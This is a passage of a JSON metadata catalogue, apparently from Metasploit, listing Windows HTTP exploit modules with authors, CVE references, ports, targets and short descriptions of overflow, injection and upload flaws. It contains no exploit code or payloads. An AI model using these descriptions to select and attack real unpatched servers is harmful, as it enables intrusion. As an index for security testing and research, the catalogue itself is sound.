"targets": [
"SAP DB 7.4 WebTools"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/sapdb_webtools.rb",
"is_install_path": true,
"ref_name": "windows/http/sapdb_webtools",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/savant_31_overflow": {
"name": "Savant 3.1 Web Server Overflow",
"full_name": "exploit/windows/http/savant_31_overflow",
"rank": 500,
"disclosure_date": "2002-09-10",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in Savant 3.1 Web Server. The service\n supports a maximum of 10 threads (for a default install). Each exploit attempt\n generally causes a thread to die whether successful or not. Therefore, in a default\n configuration, you only have 10 chances.\n\n Due to the limited space available for the payload in this exploit module, use of the\n \"ord\" payloads is recommended.",
"references": [
"CVE-2002-1120",
"OSVDB-9829",
"BID-5686",
"EDB-787"
],
"platform": "Windows",
"arch": "x86",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Universal Savant.exe",
"Windows 2000 Pro All - English",
"Windows 2000 Pro All - Italian",
"Windows 2000 Pro All - French",
"Windows XP Pro SP2 - English"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/http/savant_31_overflow.rb",
"is_install_path": true,
"ref_name": "windows/http/savant_31_overflow",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/sepm_auth_bypass_rce": {
"name": "Symantec Endpoint Protection Manager Authentication Bypass and Code Execution",
"full_name": "exploit/windows/http/sepm_auth_bypass_rce",
"rank": 600,
"disclosure_date": "2015-07-31",
"type": "exploit",
"author": [
"Markus Wulftange",
"bperry"
],
"description": "This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager\n in order to achieve a remote shell on the box as NT AUTHORITY\\SYSTEM. The vulnerabilities\n include an authentication bypass, a directory traversal and a privilege escalation to\n get privileged code execution.",
"references": [
"CVE-2015-1486",
"CVE-2015-1487",
"CVE-2015-1489",
"URL-http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html"
],
"platform": "Windows",
"arch": "",
"rport": 8443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/sepm_auth_bypass_rce.rb",
"is_install_path": true,
"ref_name": "windows/http/sepm_auth_bypass_rce",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/serviio_checkstreamurl_cmd_exec": {
"name": "Serviio Media Server checkStreamUrl Command Execution",
"full_name": "exploit/windows/http/serviio_checkstreamurl_cmd_exec",
"rank": 600,
"disclosure_date": "2017-05-03",
"type": "exploit",
"author": [
"Gjoko Krstic(LiquidWorm) <gjoko@zeroscience.mk>",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits an unauthenticated remote command execution vulnerability\n in the console component of Serviio Media Server versions 1.4 to 1.8 on\n Windows operating systems.\n\n The console service (on port 23423 by default) exposes a REST API\n which does not require authentication.\n\n The 'action' API endpoint does not sufficiently sanitize user-supplied data\n in the 'VIDEO' parameter of the 'checkStreamUrl' method. This parameter is\n used in a call to cmd.exe resulting in execution of arbitrary commands.\n\n This module has been tested successfully on Serviio Media Server versions\n 1.4.0, 1.5.0, 1.6.0 and 1.8.0 on Windows 7.",
"references": [
"OSVDB-41961",
"PACKETSTORM-142387",
"URL-http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5408.php",
"URL-https://blogs.securiteam.com/index.php/archives/3094"
],
"platform": "Windows",
"arch": "",
"rport": 23423,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/windows/http/serviio_checkstreamurl_cmd_exec.rb",
"is_install_path": true,
"ref_name": "windows/http/serviio_checkstreamurl_cmd_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/servu_session_cookie": {
"name": "Rhinosoft Serv-U Session Cookie Buffer Overflow",
"full_name": "exploit/windows/http/servu_session_cookie",
"rank": 400,
"disclosure_date": "2009-11-01",
"type": "exploit",
"author": [
"Nikolas Rangos <nikolaos@rangos.de>",
"M.Yanagishita <megumi1990@gmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Rhinosoft Serv-U 9.0.0.5.\n Sending a specially crafted POST request with an overly long session cookie\n string, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2009-4006",
"OSVDB-59772",
"URL-http://rangos.de/ServU-ADV.txt"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2003 SP2 English (NX)",
"Windows 2000 SP4 and XP SP3 English (SEH)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/servu_session_cookie.rb",
"is_install_path": true,
"ref_name": "windows/http/servu_session_cookie",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/shoutcast_format": {
"name": "SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow",
"full_name": "exploit/windows/http/shoutcast_format",
"rank": 200,
"disclosure_date": "2004-12-23",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"mandragore <mandragore@gmail.com>"
],
"description": "This module exploits a format string vulnerability in the\n Nullsoft SHOUTcast server for Windows. The vulnerability is\n triggered by requesting a file path that contains format\n string specifiers. This vulnerability was discovered by\n Tomasz Trojanowski and Damian Put.",
"references": [
"CVE-2004-1373",
"OSVDB-12585",
"BID-12096"
],
"platform": "Windows",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Windows NT SP5/SP6a English",
"Windows 2000 English ALL",
"Windows XP Pro SP0/SP1 English",
"Windows 2003 Server English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/shoutcast_format.rb",
"is_install_path": true,
"ref_name": "windows/http/shoutcast_format",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/shttpd_post": {
"name": "SHTTPD URI-Encoded POST Request Overflow",
"full_name": "exploit/windows/http/shttpd_post",
"rank": 200,
"disclosure_date": "2006-10-06",
"type": "exploit",
"author": [
"LMH <lmh@info-pull.com>",
"hdm <x@hdm.io>",
"skOd"
],
"description": "This module exploits a stack buffer overflow in SHTTPD <= 1.34.\n The vulnerability is caused due to a boundary error within the\n handling of POST requests. Based on an original exploit by skOd\n but using a different method found by hdm.",
"references": [
"CVE-2006-5216",
"OSVDB-29565",
"URL-http://shttpd.sourceforge.net",
"BID-20393"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows NT English SP5-SP6",
"Windows 2000 Spanish SP4",
"Windows 2000 French SP4",
"Windows 2000 English SP0-SP4",
"Windows 2000 French SP0-SP4",
"Windows 2003 Server English SP0-SP1",
"Windows XP German SP2",
"Windows XP German SP1",
"Windows XP English SP2",
"Windows XP English SP0-SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/shttpd_post.rb",
"is_install_path": true,
"ref_name": "windows/http/shttpd_post",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/solarwinds_fsm_userlogin": {
"name": "Solarwinds Firewall Security Manager 6.6.5 Client Session Handling Vulnerability",
"full_name": "exploit/windows/http/solarwinds_fsm_userlogin",
"rank": 600,
"disclosure_date": "2015-03-13",
"type": "exploit",
"author": [
"rgod",
"mr_me <steventhomasseeley@gmail.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits multiple vulnerabilities found in Solarwinds Firewall Security Manager\n 6.6.5. The first vulnerability is an authentication bypass via the Change Advisor interface\n due to a user-controlled session.putValue API in userlogin.jsp, allowing the attacker to set\n the 'username' attribute before authentication. The second problem is that the settings-new.jsp\n file will only check the 'username' attribute before authorizing the 'uploadFile' action,\n which can be exploited and allows the attacker to upload a fake xls host list file to the\n server, and results in arbitrary code execution under the context of SYSTEM.\n\n Depending on the installation, by default the Change Advisor web server is listening on port\n 48080 for an express install. Otherwise, this service may appear on port 8080.\n\n Solarwinds has released a fix for this vulnerability as FSM-v6.6.5-HotFix1.zip, noted in the\n references for this module.",
"references": [
"CVE-2015-2284",
"OSVDB-81634",
"ZDI-15-107",
"URL-http://downloads.solarwinds.com/solarwinds/Release/HotFix/FSM-v6.6.5-HotFix1.zip"
],
"platform": "Windows",
"arch": "",
"rport": 48080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Solarwinds Firewall Security Manager 6.6.5"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb",
"is_install_path": true,
"ref_name": "windows/http/solarwinds_fsm_userlogin",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/solarwinds_storage_manager_sql": {
"name": "Solarwinds Storage Manager 5.1.0 SQL Injection",
"full_name": "exploit/windows/http/solarwinds_storage_manager_sql",
"rank": 600,
"disclosure_date": "2011-12-07",
"type": "exploit",
"author": [
"r <r@b13$>",
"muts",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a SQL injection found in Solarwinds Storage Manager\n login interface. It will send a malicious SQL query to create a JSP file\n under the web root directory, and then let it download and execute our malicious\n executable under the context of SYSTEM.",
"references": [
"OSVDB-81634",
"EDB-18818",
"URL-http://ddilabs.blogspot.com/2012/02/solarwinds-storage-manager-server-sql.html",
"URL-http://www.solarwinds.com/documentation/storage/storagemanager/docs/ReleaseNotes/vulnerability.htm"
],
"platform": "Windows",
"arch": "",
"rport": 9000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb",
"is_install_path": true,
"ref_name": "windows/http/solarwinds_storage_manager_sql",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/sonicwall_scrutinizer_sqli": {
"name": "Dell SonicWALL (Plixer) Scrutinizer 9 SQL Injection",
"full_name": "exploit/windows/http/sonicwall_scrutinizer_sqli",
"rank": 600,
"disclosure_date": "2012-07-22",
"type": "exploit",
"author": [
"muts",
"Devon Kearns",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Dell SonicWall Scrutinizer.\n While handling the 'q' parameter, the PHP application does not properly filter\n the user-supplied data, which can be manipulated to inject SQL commands, and\n then gain remote code execution. Please note that authentication is NOT needed\n to exploit this vulnerability.",
"references": [
"CVE-2012-2962",
"OSVDB-84232",
"EDB-20033",
"BID-54625",
"URL-http://www.sonicwall.com/shared/download/Dell_SonicWALL_Scrutinizer_Service_Bulletin_for_SQL_injection_vulnerability_CVE.pdf"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Dell SonicWall Scrutinizer 9.5.1 or older"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb",
"is_install_path": true,
"ref_name": "windows/http/sonicwall_scrutinizer_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/steamcast_useragent": {
"name": "Streamcast HTTP User-Agent Buffer Overflow",
"full_name": "exploit/windows/http/steamcast_useragent",
"rank": 200,
"disclosure_date": "2008-01-24",
"type": "exploit",
"author": [
"LSO <lso@hushmail.com>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in Streamcast <= 0.9.75. By sending\n an overly long User-Agent in an HTTP GET request, an attacker may be able to\n execute arbitrary code.",
"references": [
"CVE-2008-0550",
"OSVDB-42670",
"URL-http://aluigi.altervista.org/adv/steamcazz-adv.txt",
"BID-33898"
],
"platform": "Windows",
"arch": "",
"rport": 8000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro English All",
"Windows XP Pro SP0/SP1 English"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/http/steamcast_useragent.rb",
"is_install_path": true,
"ref_name": "windows/http/steamcast_useragent",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/sws_connection_bof": {
"name": "Simple Web Server Connection Header Buffer Overflow",
"full_name": "exploit/windows/http/sws_connection_bof",
"rank": 300,
"disclosure_date": "2012-07-20",
"type": "exploit",
"author": [
"mr.pr0n",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user\n can send a long string in the Connection header to cause an overflow on the\n stack when the vsprintf() function is used, and gain arbitrary code execution. The\n module has been tested successfully on Windows 7 SP1 and Windows XP SP3.",
"references": [
"OSVDB-84310",
"EDB-19937",
"URL-http://ghostinthelab.wordpress.com/2012/07/19/simplewebserver-2-2-rc2-remote-buffer-overflow-exploit/"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"SimpleWebServer 2.2-rc2 / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/sws_connection_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/sws_connection_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/sybase_easerver": {
"name": "Sybase EAServer 5.2 Remote Stack Buffer Overflow",
"full_name": "exploit/windows/http/sybase_easerver",
"rank": 200,
"disclosure_date": "2005-07-25",
"type": "exploit",
"author": [
"Unknown"
],
"description": "This module exploits a stack buffer overflow in the Sybase EAServer Web\n Console. The offset to the SEH frame appears to change depending\n on what version of Java is in use by the remote server, making this\n exploit somewhat unreliable.",
"references": [
"CVE-2005-2297",
"OSVDB-17996",
"BID-14287"
],
"platform": "Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Windows All - Sybase EAServer 5.2 - jdk 1.3.1_11",
"Windows All - Sybase EAServer 5.2 - jdk 1.3.?.?",
"Windows All - Sybase EAServer 5.2 - jdk 1.4.2_06",
"Windows All - Sybase EAServer 5.2 - jdk 1.4.1_02"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/sybase_easerver.rb",
"is_install_path": true,
"ref_name": "windows/http/sybase_easerver",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/syncbreeze_bof": {
"name": "Sync Breeze Enterprise GET Buffer Overflow",
"full_name": "exploit/windows/http/syncbreeze_bof",
"rank": 500,
"disclosure_date": "2017-03-15",
"type": "exploit",
"author": [
"Daniel Teixeira",
"Andrew Smith",
"Owais Mehtab",
"Milton Valencia (wetw0rk)"
],
"description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of Sync Breeze Enterprise v9.4.28, v10.0.28,\n and v10.1.16, caused by improper bounds checking of the request in\n HTTP GET and POST requests sent to the built-in web server. This\n module has been tested successfully on Windows 7 SP1 x86.",
"references": [
"CVE-2017-14980"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Sync Breeze Enterprise v9.4.28",
"Sync Breeze Enterprise v10.0.28",
"Sync Breeze Enterprise v10.1.16"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/http/syncbreeze_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/syncbreeze_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/sysax_create_folder": {
"name": "Sysax Multi Server 5.64 Create Folder Buffer Overflow",
"full_name": "exploit/windows/http/sysax_create_folder",
"rank": 300,
"disclosure_date": "2012-07-29",
"type": "exploit",
"author": [
"Craig Freyman",
"Matt \"hostess\" Andreko"
],
"description": "This module exploits a stack buffer overflow in the create folder function in\n Sysax Multi Server 5.64. This issue was fixed in 5.66. In order to trigger the\n vulnerability valid credentials with the create folder permission must be provided.\n The HTTP option must be enabled on Sysax too.\n\n This module will log into the server, get a SID token, find the root folder, and\n then proceed to exploit the server. Successful exploits result in SYSTEM access.\n This exploit works on XP SP3, and Server 2003 SP1-SP2.",
"references": [
"CVE-2012-6530",
"OSVDB-82329",
"EDB-20676",
"EDB-18420",
"URL-http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html",
"URL-http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows XP SP3 / Sysax Multi Server 5.64",
"Windows 2003 SP1-SP2 / Sysax Multi Server 5.64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/sysax_create_folder.rb",
"is_install_path": true,
"ref_name": "windows/http/sysax_create_folder",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/trackercam_phparg_overflow": {
"name": "TrackerCam PHP Argument Buffer Overflow",
"full_name": "exploit/windows/http/trackercam_phparg_overflow",
"rank": 200,
"disclosure_date": "2005-02-18",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a simple stack buffer overflow in the\n TrackerCam web server. All current versions of this software\n are vulnerable to a large number of security issues. This\n module abuses the directory traversal flaw to gain\n information about the system and then uses the PHP overflow\n to execute arbitrary code.",
"references": [
"CVE-2005-0478",
"OSVDB-13953",
"OSVDB-13955",
"BID-12592",
"URL-http://aluigi.altervista.org/adv/tcambof-adv.txt"
],
"platform": "Windows",
"arch": "",
"rport": 8090,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows 2000 English",
"Windows XP English SP0/SP1",
"Windows NT 4.0 SP4/SP5/SP6"
],
"mod_time": "2017-08-14 01:40:17 +0000",
"path": "/modules/exploits/windows/http/trackercam_phparg_overflow.rb",
"is_install_path": true,
"ref_name": "windows/http/trackercam_phparg_overflow",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/trackit_file_upload": {
"name": "Numara / BMC Track-It! FileStorageService Arbitrary File Upload",
"full_name": "exploit/windows/http/trackit_file_upload",
"rank": 600,
"disclosure_date": "2014-10-07",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits an arbitrary file upload vulnerability in Numara / BMC Track-It!\n v8 to v11.X.\n The application exposes the FileStorageService .NET remoting service on port 9010\n (9004 for version 8) which accepts unauthenticated uploads. This can be abused by\n a malicious user to upload an ASP or ASPX file to the web root, leading to arbitrary\n code execution as NETWORK SERVICE or SYSTEM.\n This module has been tested successfully on versions 11.3.0.355, 10.0.51.135, 10.0.50.107,\n 10.0.0.143, 9.0.30.248 and 8.0.2.51.",
"references": [
"CVE-2014-4872",
"OSVDB-112741",
"US-CERT-VU-121036",
"URL-https://seclists.org/fulldisclosure/2014/Oct/34"
],
"platform": "Windows",
"arch": "x86",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Numara / BMC Track-It! v9 to v11.X - Windows"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/http/trackit_file_upload.rb",
"is_install_path": true,
"ref_name": "windows/http/trackit_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/trendmicro_officescan": {
"name": "Trend Micro OfficeScan Remote Stack Buffer Overflow",
"full_name": "exploit/windows/http/trendmicro_officescan",
"rank": 400,
"disclosure_date": "2007-06-28",
"type": "exploit",
"author": [
"toto"
],
"description": "This module exploits a stack buffer overflow in Trend Micro OfficeScan\n cgiChkMasterPwd.exe (running with SYSTEM privileges).",
"references": [
"CVE-2008-1365",
"OSVDB-42499"
],
"platform": "Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows 2000 - Trend Micro OfficeScan 7.3.0.1293"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/trendmicro_officescan.rb",
"is_install_path": true,
"ref_name": "windows/http/trendmicro_officescan",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/trendmicro_officescan_widget_exec": {
"name": "Trend Micro OfficeScan Remote Code Execution",
"full_name": "exploit/windows/http/trendmicro_officescan_widget_exec",
"rank": 600,
"disclosure_date": "2017-10-07",
"type": "exploit",
"author": [
"mr_me <mr_me@offensive-security.com>",
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module chains an authentication bypass with a command injection vulnerability. Unauthenticated users can execute a\n terminal command under the context of the web server user.\n\n The specific flaw exists within the management interface, which listens on TCP port 443 by default. The Trend Micro OfficeScan product\n has a widget feature which is implemented with PHP. Talker.php takes ack and hash parameters but doesn't validate these values, which\n leads to an authentication bypass for the widget. Proxy.php files under the mod TMCSS folder take multiple parameters, but the process\n does not properly validate a user-supplied string before using it to execute a system call. Due to the combination of these vulnerabilities,\n unauthenticated users can execute a terminal command under the context of the web server user.",
"references": [
"CVE-2017-11394",
"URL-https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/",
"URL-http://www.zerodayinitiative.com/advisories/ZDI-17-521/"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting",
"OfficeScan 11",
"OfficeScan XG"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/http/trendmicro_officescan_widget_exec.rb",
"is_install_path": true,
"ref_name": "windows/http/trendmicro_officescan_widget_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/ultraminihttp_bof": {
"name": "Ultra Mini HTTPD Stack Buffer Overflow",
"full_name": "exploit/windows/http/ultraminihttp_bof",
"rank": 300,
"disclosure_date": "2013-07-10",
"type": "exploit",
"author": [
"superkojiman",
"PsychoSpy <neinwechter@gmail.com>",
"OJ Reeves <oj@buffered.io>"
],
"description": "This module exploits a stack based buffer overflow in Ultra Mini HTTPD 1.21,\n allowing remote attackers to execute arbitrary code via a long resource name in an HTTP\n request. This exploit has to deal with the fact that the application's request handler\n thread is terminated after 60 seconds by a \"monitor\" thread. To do this, it allocates\n some RWX memory, copies the payload to it and creates another thread. When done, it\n terminates the current thread so that it doesn't crash and hence doesn't bring down\n the process with it.",
"references": [
"OSVDB-95164",
"EDB-26739",
"CVE-2013-5019",
"BID-61130"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"v1.21 - Windows Server 2000",
"v1.21 - Windows XP SP0",
"v1.21 - Windows XP SP2/SP3",
"v1.21 - Windows Server 2003 (Enterprise)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/ultraminihttp_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/ultraminihttp_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/umbraco_upload_aspx": {
"name": "Umbraco CMS Remote Command Execution",
"full_name": "exploit/windows/http/umbraco_upload_aspx",
"rank": 600,
"disclosure_date": "2012-06-28",
"type": "exploit",
"author": [
"Toby Clarke",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module can be used to execute a payload on Umbraco CMS 4.7.0.378.\n The payload is uploaded as an ASPX script by sending a specially crafted\n SOAP request to codeEditorSave.asmx, which permits unauthorized file upload\n via the SaveDLRScript operation. SaveDLRScript is also subject to a path\n traversal vulnerability, allowing code to be placed into the web-accessible\n /umbraco/ directory.\n\n The module writes, executes and then overwrites an ASPX script; note that\n though the script content is removed, the file remains on the target. Automatic\n cleanup of the file is intended if a meterpreter payload is used.\n\n This module has been tested successfully on Umbraco CMS 4.7.0.378 on Windows\n 7 32-bit SP1. In this scenario, the \"IIS APPPOOL\\ASP.NET v4.0\" user must have\n write permissions on the Windows Temp folder.",
"references": [
"OSVDB-83765",
"EDB-19671",
"URL-http://blog.gdssecurity.com/labs/2012/7/3/find-bugs-faster-with-a-webmatrix-local-reference-instance.html",
"URL-http://umbraco.codeplex.com/workitem/18192"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Umbraco CMS 4.7.0.378 / Microsoft Windows 7 Professional 32-bit SP1"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/http/umbraco_upload_aspx.rb",
"is_install_path": true,
"ref_name": "windows/http/umbraco_upload_aspx",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/vmware_vcenter_chargeback_upload": {
"name": "VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload",
"full_name": "exploit/windows/http/vmware_vcenter_chargeback_upload",
"rank": 600,
"disclosure_date": "2013-05-15",
"type": "exploit",
"author": [
"Andrea Micalizzi",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a code execution flaw in VMware vCenter Chargeback Manager,\n where the ImageUploadServlet servlet allows unauthenticated file upload. The files\n are uploaded to the /cbmui/images/ web path, where JSP code execution is allowed.\n The module has been tested successfully on VMware vCenter Chargeback Manager 2.0.1\n on Windows 2003 SP2.",
"references": [
"CVE-2013-3520",
"OSVDB-94188",
"BID-60484",
"ZDI-13-147"
],
"platform": "Windows",
"arch": "x86",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"VMware vCenter Chargeback Manager 2.0.1 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb",
"is_install_path": true,
"ref_name": "windows/http/vmware_vcenter_chargeback_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/vxsrchs_bof": {
"name": "VX Search Enterprise GET Buffer Overflow",
"full_name": "exploit/windows/http/vxsrchs_bof",
"rank": 500,
"disclosure_date": "2017-03-15",
"type": "exploit",
"author": [
"Daniel Teixeira"
],
"description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of VX Search Enterprise v9.5.12, caused by\n improper bounds checking of the request path in HTTP GET requests\n sent to the built-in web server. This module has been tested\n successfully on Windows 7 SP1 x86.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"VX Search Enterprise v9.5.12"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/vxsrchs_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/vxsrchs_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/webster_http": {
"name": "Webster HTTP Server GET Buffer Overflow",
"full_name": "exploit/windows/http/webster_http",
"rank": 200,
"disclosure_date": "2002-12-02",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This exploits a stack buffer overflow in the Webster HTTP server.\n The server and source code was released within an article from\n the Microsoft Systems Journal in February 1996 titled \"Write a\n Simple HTTP-based Server Using MFC and Windows Sockets\".",
"references": [
"CVE-2002-2268",
"OSVDB-44106",
"BID-6289",
"URL-http://www.microsoft.com/msj/archive/s25f.aspx",
"URL-http://www.netdave.com/webster/webster.htm"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows XP SP0",
"Debug"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/http/webster_http.rb",
"is_install_path": true,
